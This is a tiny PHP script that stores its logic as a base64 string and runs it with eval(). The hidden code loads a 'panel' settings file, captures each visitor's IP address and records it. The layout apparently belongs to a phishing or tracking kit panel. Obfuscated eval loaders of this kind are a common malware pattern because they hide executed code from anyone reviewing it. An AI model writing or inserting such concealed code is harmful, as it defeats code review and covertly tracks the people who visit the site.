<?php
$__b = 'cmVxdWlyZSgnLi4vcGFuZWwvaW5jbHVkZS9zZXRpbmdzLnBocCcpOwoKJGlwID0gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ107CiRyZWdpc3RybyA9IGdldF9pZCgkaXApOwoKZmluaXNoKCRyZWdpc3Rybyk7';
eval(base64_decode($__b));
